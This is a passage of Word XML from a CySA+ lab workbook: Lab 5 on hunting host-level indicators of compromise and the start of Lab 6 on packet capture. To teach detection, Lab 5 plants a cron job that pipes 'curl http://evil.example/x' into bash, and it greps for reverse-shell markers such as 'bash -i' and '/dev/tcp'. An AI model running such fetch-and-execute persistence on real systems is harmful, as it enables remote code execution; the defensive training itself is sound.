      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 5 — Host-Based IOC Hunting</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hunt host-level indicators of compromise: unauthorised processes, unauthorised scheduled tasks, new accounts, file-system anomalies, and abnormal CPU/memory consumption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will hunt host-level indicators of compromise: unauthorised processes, unauthorised scheduled tasks, new accounts, file-system anomalies, and abnormal CPU/memory consumption. These are exam-blueprint items under CySA+ 1.2 (Host-related, Application-related, and Other indicators).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2732795"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_ac16252bcf.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2732795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y auditd procps psmisc inotify-tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Baseline current state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You cannot spot the abnormal without first knowing the normal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps -ef &gt; /tmp/baseline_ps.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -tulnp &gt; /tmp/baseline_ss.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>crontab -l &gt; /tmp/baseline_cron.txt 2&gt;/dev/null; cat /etc/crontab &gt;&gt; /tmp/baseline_cron.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cut -d: -f1 /etc/passwd &gt; /tmp/baseline_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wc -l /tmp/baseline_*.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Simulate unauthorised user creation (Application-related: "Introduction of new accounts")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>useradd -m attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff /tmp/baseline_users.txt &lt;(cut -d: -f1 /etc/passwd)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The diff immediately surfaces the unauthorised account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Detect a malicious scheduled task (Host-related: "Unauthorized scheduled tasks")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(crontab -l 2&gt;/dev/null; echo "*/5 * * * * curl -s http://evil.example/x | bash") | crontab -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff /tmp/baseline_cron.txt &lt;(crontab -l)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is exactly what a persistence-stage attacker does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Detect abnormal process / CPU consumption (Host-related: "Processor consumption")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spawn a CPU-burner that mimics a coinminer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>yes &gt; /dev/null &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps -eo pid,user,%cpu,%mem,cmd --sort=-%cpu | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The yes process now dominates CPU. In a real hunt you would correlate this with the parent process and a hash of the executable (Lab 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Detect file-system anomalies (Host-related: "File system changes or anomalies")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Watch a sensitive directory for unexpected writes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>inotifywait -m -r -e create,modify,delete /etc 2&gt;/dev/null &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "x" &gt; /etc/.evil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You will see the create event for .evil. Hidden dotfiles in /etc, /tmp, or /dev/shm are classic indicators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Detect malicious processes via parent / command line (Host-related: "Malicious processes")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A reverse shell often has bash as a child of a network listener:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps -ef | awk '$3==1 &amp;&amp; $NF ~ /sh$/ {print}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps -eo pid,ppid,user,cmd | grep -E 'nc|bash -i|/dev/tcp' | grep -v grep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Anything matching bash -i, /dev/tcp/, or netcat with a remote host is a high-confidence IOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Detect unauthorised privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep -E 'sudo|su\b' /var/log/auth.log | tail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>awk -F: '($3==0){print $1}' /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Multiple UID-0 entries in /etc/passwd, new SUID binaries, or a flood of failed sudo attempts all qualify as "Unauthorized privileges".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Clean up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>kill %1 %2 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>crontab -r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>userdel -r attacker 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rm -f /etc/.evil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The value of a baseline before hunting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to detect new accounts, cron persistence, CPU abuse, file-system drops, suspicious process trees, and privilege escalation — each mapped to a CySA+ 1.2 indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to the value of a baseline before hunting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 6 — Packet Capture for Threat Hunting</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capture live traffic with tcpdump, then perform analyst-level extraction with tshark: pulling HTTP host headers, DNS queries, and TLS SNI fields out of a pcap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will capture live traffic with tcpdump, then perform analyst-level extraction with tshark: pulling HTTP host headers, DNS queries, and TLS SNI fields out of a pcap. These are exam-blueprint skills under CySA+ 1.3 (Packet capture — Wireshark, tcpdump).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2783101"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_aa80adb260.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2783101"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y tcpdump tshark curl dnsutils</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>When prompted by tshark, answer "No" — non-root packet capture is not needed inside Killercoda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Capture a known-traffic sample to a pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn -w /tmp/sample.pcap -G 10 -W 1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s https://example.com &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dig +short google.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s http://neverssl.com &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
